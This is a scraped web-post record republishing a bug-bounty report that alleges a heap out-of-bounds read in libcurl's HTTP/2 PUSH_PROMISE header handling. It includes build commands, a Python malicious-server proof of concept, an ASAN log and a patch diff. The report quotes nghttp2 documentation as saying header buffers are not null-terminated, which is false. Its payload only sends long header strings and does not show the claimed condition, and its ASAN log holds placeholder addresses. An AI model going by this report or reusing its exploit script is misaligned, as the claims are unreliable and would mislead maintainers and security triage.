{“lastseen”:”2026-01-10T22:25:46″,”description”:”Summary\\nA heap-based out-of-bounds read vulnerability exists in libcurl’s HTTP\/2 implementation. The on_header callback in lib\/http2.c incorrectly treats header names and values provided by nghttp2 as null-terminated C-strings. Specifically, passing these pointers to curl_maprintf with the %s format specifier triggers an out-of-bounds read via strlen(), as nghttp2 provides raw byte buffers with explicit lengths, not null-terminated strings.\\n+1\\n\\nVulnerability Analysis \\u0026 Root Cause\\n1. API Contract Violation: According to the nghttp2 documentation, the nghttp2_on_header_callback provides pointers to the header name and value (name, value) alongside their lengths (namelen, valuelen). The documentation explicitly states:\\n\\n\\”The ‘name’ and ‘value’ pointers are NOT guaranteed to be null-terminated. […] Applications MUST use the provided length parameters.\\”.\\n\\n2. Vulnerable Implementation: In lib\/http2.c, the on_header function ignores the length parameters when formatting the string for PUSH_PROMISE headers, relying on curl_maprintf which internally uses strlen:\\n\\nC\\n\\n\/* lib\/http2.c around line 1642 – Vulnerable *\/\\nh = curl_maprintf(\\”%s:%s\\”, name, value); \\n3. Execution Flow:\\n\\ncurl_maprintf parses the %s format specifier.\\n\\nIt internally calls strlen() on the name and value pointers.\\n\\nSince the malicious server sends a header without a null byte, strlen() reads past the allocated buffer boundary until it hits a coincidental null byte in adjacent heap memory.\\n\\nThis results in an Out-of-Bounds Read.\\n\\nSteps to Reproduce\\n1. Build Environment\\nCompile cURL with AddressSanitizer (ASAN) to visualize the memory violation:\\n\\nBash\\n\\n.\/configure –with-nghttp2 –enable-debug CFLAGS=\\”-fsanitize=address -g\\” LDFLAGS=\\”-fsanitize=address\\”\\nmake -j$(nproc)\\n2. Reproduction Script (http2_server.py)\\nThis Python script (using h2) establishes an HTTP\/2 connection and pushes a stream with a non-null-terminated header.\\n\\nPython\\n\\nimport asyncio, h2.connection, h2.events, h2.config\\n\\nasync def handle(reader, writer):\\n config = h2.config.H2Configuration(client_side=False)\\n conn = h2.connection.H2Connection(config=config)\\n conn.initiate_connection()\\n conn.update_settings({h2.settings.SettingCodes.ENABLE_PUSH: 1})\\n writer.write(conn.data_to_send())\\n await writer.drain()\\n\\n data = await reader.read(65535)\\n events = conn.receive_data(data)\\n \\n for event in events:\\n if isinstance(event, h2.events.RequestReceived):\\n conn.send_headers(event.stream_id, [(‘:status’, ‘200’)])\\n \\n # MALICIOUS PAYLOAD: Header with no null termination logic\\n malicious_name = b’x-oob-test’ + b’A’ * 64 \\n malicious_val = b’trigger’ + b’B’ * 64\\n \\n conn.push_stream(event.stream_id, event.stream_id + 2, [\\n (b’:method’, b’GET’), (b’:path’, b’\/push’),\\n (b’:scheme’, b’http’), (b’:authority’, b’localhost’),\\n (malicious_name, malicious_val)\\n ])\\n writer.write(conn.data_to_send())\\n await writer.drain()\\n break\\n writer.close()\\n\\nasyncio.run(asyncio.start_server(handle, ‘127.0.0.1’, 8080).serve_forever())\\n3. Execution\\nRun the server and connect with the ASAN-enabled cURL:\\n\\nBash\\n\\n# Terminal 1\\npython3 http2_server.py\\n\\n# Terminal 2\\nASAN_OPTIONS=detect_stack_use_after_return=1 .\/src\/curl -v –http2-prior-knowledge http:\/\/127.0.0.1:8080\/\\nEvidence (ASAN Log)\\nThe following ASAN output confirms the read overflow. The READ of size… occurs inside strlen called by curl_maprintf.\\n\\nPlaintext\\n\\n==67356==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6c352e0e001a…\\nREAD of size 11 at 0x6c352e0e001a thread T0\\n #0 0x… in strlen\\n #1 0x… in curl_maprintf\\n #2 0x… in on_header lib\/http2.c:1642\\n…\\n0x6c352e0e001a is located 0 bytes after 10-byte region…\\nRecommended Fix\\nThe code must use the explicit namelen and valuelen parameters provided by the nghttp2 callback to limit the read operation.\\n\\nPatch (lib\/http2.c): Use the precision specifier %.*s which takes the length as an integer argument before the string pointer.\\n\\nC\\n\\n\/* Fixed implementation *\/\\nh = curl_maprintf(\\”%.*s:%.*s\\”, (int)namelen, name, (int)valuelen, value);\\nDiff:\\n\\nDiff\\n\\n— a\/lib\/http2.c\\n+++ b\/lib\/http2.c\\n@@ -1642,7 +1642,7 @@ static int on_header(nghttp2_session *session, const nghttp2_frame *frame,\\n- h = curl_maprintf(\\”%s:%s\\”, name, value);\\n+ h = curl_maprintf(\\”%.*s:%.*s\\”, (int)namelen, name, (int)valuelen, value);\\n\\n## Impact\\n\\nImpact\\nInformation Disclosure: Attackers can read sensitive data (keys, tokens, other request data) from the heap memory adjacent to the header buffer.\\n\\nAvailability: If the OOB read accesses unmapped memory, the application will crash.”,”published”:”2026-01-10T19:22:26″,”modified”:”2026-01-10T21:57:49″,”type”:”hackerone”,”title”:”curl: Heap Out-of-Bounds Read in lib\/http2.c via Malformed PUSH_PROMISE Headers”,”source”:””,”references”:””,”id”:”H1:3506159″,”bulletinFamily”:”bugbounty”,”cwe”:null,”cvelist”:[],”sourceData”:””,”sourceHref”:””,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/hackerone.com\/reports\/3506159″,”category_name”:”News”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-01-10T22:25:46″,”description”:”Summary\\nA heap-based out-of-bounds read vulnerability exists in libcurl’s HTTP\/2 implementation. The on_header callback in lib\/http2.c incorrectly treats header names and values provided by nghttp2 as…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[6,8,12,117,13,33,7,11,5],"class_list":["post-35052","post","type-post","status-publish","format-standard","hentry","category-category_news","tag-cve","tag-cvss","tag-exploit","tag-hackerone","tag-news","tag-none","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n